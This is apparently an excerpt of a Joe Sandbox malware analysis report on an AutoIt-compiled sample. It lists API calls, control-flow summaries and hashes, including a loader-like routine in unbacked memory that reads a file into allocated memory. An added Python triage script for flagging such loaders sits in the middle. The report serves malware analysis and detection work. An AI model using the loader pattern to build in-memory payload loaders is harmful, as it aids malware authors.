                                                                          • Part of subcall function 00EBBDB4: __time64.LIBCMT ref: 00EBBDBE
                                                                          • Part of subcall function 00E74517: _fseek.LIBCMT ref: 00E7452F
                                                                        • __wsplitpath.LIBCMT ref: 00EBC083
                                                                          • Part of subcall function 00E91DFC: __wsplitpath_helper.LIBCMT ref: 00E91E3C
                                                                        • _wcscpy.LIBCMT ref: 00EBC096
                                                                        • _wcscat.LIBCMT ref: 00EBC0A9
                                                                        • __wsplitpath.LIBCMT ref: 00EBC0CE
                                                                        • _wcscat.LIBCMT ref: 00EBC0E4
                                                                        • _wcscat.LIBCMT ref: 00EBC0F7
                                                                        • _wcscmp.LIBCMT ref: 00EBC03E
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC65D
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC670
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EBC2A1
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EBC338
                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EBC34E
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EBC35F
                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EBC371
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 2378138488-0
                                                                        • Opcode ID: f45785a4920c4a759625344b20421b9e5b95d30a847b76011b094246a77d7ad3
                                                                        • Instruction ID: db605038f92ec978789ad7d7ccef589705bab83743e94e20da8b4892984ec134
                                                                        • Opcode Fuzzy Hash: f45785a4920c4a759625344b20421b9e5b95d30a847b76011b094246a77d7ad3
                                                                        • Instruction Fuzzy Hash: 27C13BB1A04129AFDF21DF95CC81EDEB7F9AF48300F1090A6F619F6151DB709A448F61

                                                                        Control-flow Graph
                                                                        (Rendered as an executed/not-executed coloured graph in the original report; only the recoverable summary is kept here.) Basic blocks e73742-e73845 and ee1da3-ee1ea2, a window procedure dispatching on the message: the default path ends in DefWindowProcW (e737ab); one branch calls KillTimer (timer id 1) followed by internal calls e73847 and e7390f; another calls SetTimer (timer id 1, 0x2EE = 750 ms) and RegisterWindowMessageW("TaskbarCreated"), then conditionally CreatePopupMenu; another calls PostQuitMessage(0); further branches call MoveWindow, SetFocus and the internal routines e72ff6, e8e312, eb4ddd, e8eb83, eaa5f3, eb55bd and e74ffc.
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00E737B3
                                                                        • KillTimer.USER32(?,00000001), ref: 00E737DD
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E73800
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7380B
                                                                        • CreatePopupMenu.USER32 ref: 00E7381F
                                                                        • PostQuitMessage.USER32(00000000), ref: 00E7382E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 5e19de463dc1783f2b77a412d7ea5a062d188de314d7b9d3313da8572c772afa
                                                                        • Instruction ID: ae547d6c712c7d9487b6b37dc6c01da567377dfb17f190ae058f06bde5079a69
                                                                        • Opcode Fuzzy Hash: 5e19de463dc1783f2b77a412d7ea5a062d188de314d7b9d3313da8572c772afa
                                                                        • Instruction Fuzzy Hash: A54149F510414EABDB5CAF38DC4ABBB3696FB40310F04A116F90AF2191DB709D40B761

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E73E79
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E73E88
                                                                        • LoadIconW.USER32(00000063), ref: 00E73E9E
                                                                        • LoadIconW.USER32(000000A4), ref: 00E73EB0
                                                                        • LoadIconW.USER32(000000A2), ref: 00E73EC2
                                                                          • Part of subcall function 00E74024: LoadImageW.USER32(00E70000,00000063,00000001,00000010,00000010,00000000), ref: 00E74048
                                                                        • RegisterClassExW.USER32(?), ref: 00E73F30
                                                                          • Part of subcall function 00E73F53: GetSysColorBrush.USER32(0000000F), ref: 00E73F86
                                                                          • Part of subcall function 00E73F53: RegisterClassExW.USER32(00000030), ref: 00E73FB0
                                                                          • Part of subcall function 00E73F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E73FC1
                                                                          • Part of subcall function 00E73F53: InitCommonControlsEx.COMCTL32(?), ref: 00E73FDE
                                                                          • Part of subcall function 00E73F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E73FEE
                                                                          • Part of subcall function 00E73F53: LoadIconW.USER32(000000A9), ref: 00E74004
                                                                          • Part of subcall function 00E73F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E74013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: 49c652837e7316f36d18bad33e77e47bb906701a96d40b1f115c75ba6ba5cdb9
                                                                        • Instruction ID: 6b17f5c9e36470b0c0b0f2d19271305a2bfeed391c6676090fd050c3f294c10e
                                                                        • Opcode Fuzzy Hash: 49c652837e7316f36d18bad33e77e47bb906701a96d40b1f115c75ba6ba5cdb9
                                                                        • Instruction Fuzzy Hash: 942147B0D04308AFDB14EFA9EC45A99BFF6FB48320F10812AE615A72A0D7754544EF91

                                                                        Control-flow Graph
                                                                        (Rendered as an executed/not-executed coloured graph in the original report; only the recoverable summary is kept here.) Basic blocks 17ce9e0-17cece2 in the non-PE-backed region: call 17cc400, call 17cf8f0, CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc, a loop around call 17cfb40, call 17cf950, CloseHandle, VirtualFree, and a second VirtualFree on the cleanup path; every failure edge collapses to the exit block at 17cec0d, and block 17cebfe-17cec07 loops back to the CreateFileW block, so the routine iterates over more than one file. Note that VirtualAlloc, ReadFile and CloseHandle are visible only in the graph: the resolved API list below shows just CreateFileW and VirtualFree.
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017CEAB1
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017CECD7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                        • Instruction ID: 389ad907d25e7f395bf06f7ed9019e983249eb3d3d532f2bc8cc1a6ce4b61dd5
                                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                        • Instruction Fuzzy Hash: 10A1F974E00209EBDB14CFA8C958BEEFBB5BF48704F10819DE515AB281DB759A41CFA4
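The function at 017CE9E0 above executes from a region the report marks "based on PE: false" (memory not backed by a loaded image) and opens a file read-only (dwDesiredAccess 0x80000000 = GENERIC_READ, dwCreationDisposition 3 = OPEN_EXISTING, dwFlagsAndAttributes 0x80 = FILE_ATTRIBUTE_NORMAL) before releasing memory with VirtualFree(..., 0x8000 = MEM_RELEASE); its graph also contains VirtualAlloc and ReadFile. File access plus virtual-memory management in unbacked memory is the shape of a manual loader that reads a payload from disk into a fresh allocation, and it is worth a triage rule. The following Python is an added example, not Joe Sandbox code and not part of the analysed sample: it parses the "APIs" and "Memory Dump Source" lines in the format used on this page and flags functions that show that combination. The constructed input reuses the two function listings from this section (the loader-shaped one and the PE-backed registry reader at 00E749FB as a negative case). The only assumption is that the CreateFileW listing at 017CEAB1 carries one stack slot before lpFileName, inferred from the argument pattern, which is why the decoder takes the lpFileName index explicitly.

```python
"""Triage helper for Joe Sandbox function listings (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: the "APIs" and "Memory Dump Source" lines of two functions
# copied from this report section (indentation and "Download File" labels removed).
REPORT_EXCERPT = r"""
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017CEAB1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017CECD7
Memory Dump Source
• Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
Similarity
• API ID: CreateFileFreeVirtual
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E74A1D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EE41DB
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EE421A
• RegCloseKey.ADVAPI32(?), ref: 00EE4249
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
Similarity
• API ID: QueryValue$CloseOpen
"""

# One API line: "• Name.MODULE(args), ref: ADDR"; parentheses are absent for calls
# without resolved arguments, and "Part of subcall function X:" may prefix the line.
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
APIID_RE = re.compile(r"^•\s*API ID:\s*(?P<id>.*)$")


@dataclass
class ApiCall:
    name: str        # "CreateFileW"
    module: str      # "KERNELBASE"
    args: List[str]  # argument slots as printed; "?" means unresolved
    ref: int         # call-site address


@dataclass
class Function:
    apis: List[ApiCall] = field(default_factory=list)
    region_offset: Optional[int] = None
    pe_backed: Optional[bool] = None  # False: region is not backed by a loaded image
    api_id: str = ""


def parse_functions(text: str) -> List[Function]:
    """Each "APIs" heading opens a function record; its "API ID" line closes it."""
    functions: List[Function] = []
    current: Optional[Function] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Function()
            functions.append(current)
            continue
        if current is None:
            continue
        if (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            current.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif (m := SOURCE_RE.search(line)):
            current.region_offset = int(m["off"], 16)
            current.pe_backed = m["pe"] == "true"
        elif (m := APIID_RE.match(line)):
            current.api_id = m["id"].strip()
            current = None
    return functions


FILE_APIS = {"CreateFileW", "CreateFileA", "ReadFile", "GetFileSize", "SetFilePointer"}
MEMORY_APIS = {"VirtualAlloc", "VirtualAllocEx", "VirtualFree", "VirtualProtect"}


def loader_indicators(fn: Function) -> List[str]:
    """Reasons a function looks like a manual loader; both must hold to flag it."""
    names = {a.name for a in fn.apis}
    reasons = []
    if fn.pe_backed is False:
        reasons.append("code executes from memory not backed by a PE image")
    if names & FILE_APIS and names & MEMORY_APIS:
        reasons.append("file access combined with virtual-memory management")
    return reasons


def is_loader_like(fn: Function) -> bool:
    return len(loader_indicators(fn)) == 2


GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def createfile_summary(call: ApiCall, first_param_index: int) -> str:
    """Decode dwDesiredAccess and dwCreationDisposition of a CreateFileW listing.

    Joe Sandbox prints stack slots at the call site, so slots may precede lpFileName;
    the caller passes the index where lpFileName starts (1 for ref 017CEAB1 in this
    report, inferred from the argument pattern: an assumption of this example).
    """
    def slot(i: int) -> Optional[int]:
        j = first_param_index + i
        if j < len(call.args) and call.args[j] != "?":
            return int(call.args[j], 16)
        return None

    words = []
    access = slot(1)  # dwDesiredAccess
    if access is not None:
        bits = [n for n, b in (("GENERIC_READ", GENERIC_READ), ("GENERIC_WRITE", GENERIC_WRITE)) if access & b]
        words.append("|".join(bits) or f"access=0x{access:08X}")
    disposition = slot(4)  # dwCreationDisposition
    if disposition is not None:
        words.append(CREATION_DISPOSITION.get(disposition, f"disposition={disposition}"))
    return " ".join(words)


if __name__ == "__main__":
    for fn in parse_functions(REPORT_EXCERPT):
        flag = "LOADER-LIKE" if is_loader_like(fn) else "ok"
        print(f"{fn.region_offset:08X} pe_backed={fn.pe_backed} [{flag}] {fn.api_id}")
        for call in fn.apis:
            if call.name == "CreateFileW":
                print("   CreateFileW:", createfile_summary(call, first_param_index=1))
```

Run as a script it prints one line per function and flags 017CC000 as loader-like while the 00E70000 registry reader passes; the graph-only calls (VirtualAlloc, ReadFile, CloseHandle) are not in the resolved API list, so a rule that requires ReadFile specifically would miss this function, which is why the file-API set is matched as a group rather than by a single name.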

                                                                        Control-flow Graph
                                                                        (Rendered as an executed/not-executed coloured graph in the original report; only the recoverable summary is kept here.) Basic blocks e749fb-e74a2f and ee41cc-ee424f: call e7bcce, then RegOpenKeyExW(HKEY_CURRENT_USER (80000001), "Software\AutoIt v3\AutoIt", KEY_QUERY_VALUE (00000001)); on success RegQueryValueExW("Include") with a null buffer to obtain the size, calls e8f4ea and e747b7, a second RegQueryValueExW("Include") to read the value, then call e76a63 or call e747e2, and RegCloseKey.
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E74A1D
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EE41DB
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EE421A
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00EE4249
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: e7eba74b787c1601398ce6df4d7708ad82fbc7d5af265f5088d9a33348b24d08
                                                                        • Instruction ID: 9259f405eb4a40129c0daf3fb4f5ec6a046006f62f1e143dd9bcc59be37b6bfb
                                                                        • Opcode Fuzzy Hash: e7eba74b787c1601398ce6df4d7708ad82fbc7d5af265f5088d9a33348b24d08
                                                                        • Instruction Fuzzy Hash: 71113DB1A01109BFEB04ABA5CD86DBF7BBDEF44344F005059F506E6191EB709E05E750

                                                                        Control-flow Graph
                                                                        (Rendered as an executed/not-executed coloured graph in the original report; only the recoverable summary is kept here.) A single basic block e736b8-e73728 with no branches: CreateWindowExW for the "AutoIt v3" class and title (style 00CF0000 = WS_OVERLAPPEDWINDOW, position CW_USEDEFAULT (80000000), 0x12C x 0x64 = 300 x 100 pixels), CreateWindowExW for a child "edit" control (style 50B008C4 = WS_CHILD|WS_VISIBLE|WS_BORDER|WS_VSCROLL|WS_HSCROLL|ES_MULTILINE|ES_AUTOVSCROLL|ES_AUTOHSCROLL|ES_READONLY), then ShowWindow twice.
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E736E6
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73707
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E7371B
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E73724
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: e5b269c7a71eb1a5ddfe058fbabdfe5c69e4fb5b1caa21af5b21a20530794faa
                                                                        • Instruction ID: 43da41b9cf16d3db0af2ed4dc7b5b4e9d557fdb2bc67040bf2d94bb00eadb809
                                                                        • Opcode Fuzzy Hash: e5b269c7a71eb1a5ddfe058fbabdfe5c69e4fb5b1caa21af5b21a20530794faa
                                                                        • Instruction Fuzzy Hash: 7AF03AB06402D87AE7305757AC4CE773E7FE7C6F30B00401BBA08A62A1C2650885EAB0

                                                                        Control-flow Graph
                                                                        (Rendered as an executed/not-executed coloured graph in the original report; only the recoverable summary is kept here.) Basic blocks e97b47-e97bbc: call e9123a (__init_pointers) and call e97e23 (__mtinitlocks); on failure call e97bbd (__mtterm); otherwise call e97e6d, call e96986 (__calloc_crt), call e97ec9, then call e97a94 and GetCurrentThreadId, with each failure path again ending in call e97bbd. This layout matches the MSVC CRT's multithreading initialisation rather than sample-specific code.
                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 00E97B47
                                                                          • Part of subcall function 00E9123A: __initp_misc_winsig.LIBCMT ref: 00E9125E
                                                                          • Part of subcall function 00E9123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E97F51
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E97F65
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E97F78
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E97F8B
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E97F9E
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E97FB1
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E97FC4
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E97FD7
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E97FEA
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E97FFD
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E98010
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E98023
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E98036
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E98049
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E9805C
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E9806F
                                                                        • __mtinitlocks.LIBCMT ref: 00E97B4C
                                                                          • Part of subcall function 00E97E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00F2AC68,00000FA0,?,?,00E97B51,00E95E77,00F26C70,00000014), ref: 00E97E41
                                                                        • __mtterm.LIBCMT ref: 00E97B55
                                                                          • Part of subcall function 00E97BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E97B5A,00E95E77,00F26C70,00000014), ref: 00E97D3F
                                                                          • Part of subcall function 00E97BBD: _free.LIBCMT ref: 00E97D46
                                                                          • Part of subcall function 00E97BBD: DeleteCriticalSection.KERNEL32(00F2AC68,?,?,00E97B5A,00E95E77,00F26C70,00000014), ref: 00E97D68
                                                                        • __calloc_crt.LIBCMT ref: 00E97B7A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E97BA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 2942034483-0
                                                                        • Opcode ID: f505eefc0630607a3f32fea9374b3e3e6cea33b58f84abb75f7856823fd4defd
                                                                        • Instruction ID: 9ced037f657f0987cea9049437fa97d7196d338b1cb9dab51bd98f8417a82c27
                                                                        • Opcode Fuzzy Hash: f505eefc0630607a3f32fea9374b3e3e6cea33b58f84abb75f7856823fd4defd
                                                                        • Instruction Fuzzy Hash: 9AF0BB3253D3121AEE3977347C0764B3BD6AF01734B202699F8E4F50E1FF21884A4160

                                                                         Control-flow Graph
                                                                         • Basic blocks (id: address range, notable calls) with successor edges (->):
                                                                         • 1285: 17ce7b0-17ce8db (call 17cc400, call 17ce6a0, CreateFileW) -> 1292, 1293
                                                                         • 1292: 17ce8dd -> 1294
                                                                         • 1293: 17ce8e2-17ce8f2 -> 1296, 1297
                                                                         • 1294: 17ce992-17ce997
                                                                         • 1296: 17ce8f9-17ce913 (VirtualAlloc) -> 1298, 1299
                                                                         • 1297: 17ce8f4 -> 1294
                                                                         • 1298: 17ce915 -> 1294
                                                                         • 1299: 17ce917-17ce92e (ReadFile) -> 1300, 1301
                                                                         • 1300: 17ce930 -> 1294
                                                                         • 1301: 17ce932-17ce96c (call 17ce6e0, call 17cd6a0) -> 1306, 1307
                                                                         • 1306: 17ce96e-17ce983 (call 17ce730) -> 1307
                                                                         • 1307: 17ce988-17ce990 (ExitProcess) -> 1294
                                                                        APIs
                                                                          • Part of subcall function 017CE6A0: Sleep.KERNELBASE(000001F4), ref: 017CE6B1
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017CE8D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: L2N6Z3FUWAMLXO3I7AW81QCFI
                                                                        • API String ID: 2694422964-219300842
                                                                        • Opcode ID: 73c7524c4513338557feef578c1673ddf4fd89be33b4bb4aa800eb17af5b6707
                                                                        • Instruction ID: 4135f0c3dfae7faf199dc1b00fb50fd20cad91f8e92b88663fad1161d76f4dd8
                                                                        • Opcode Fuzzy Hash: 73c7524c4513338557feef578c1673ddf4fd89be33b4bb4aa800eb17af5b6707
                                                                        • Instruction Fuzzy Hash: 4F518170D04289DAEB11DBA8C858BEEFFB89F15704F04419DE6487B2C1D6B91B44CBA6
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E7522F
                                                                        • _wcscpy.LIBCMT ref: 00E75283
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E75293
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EE3CB0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1053898822-1585850449
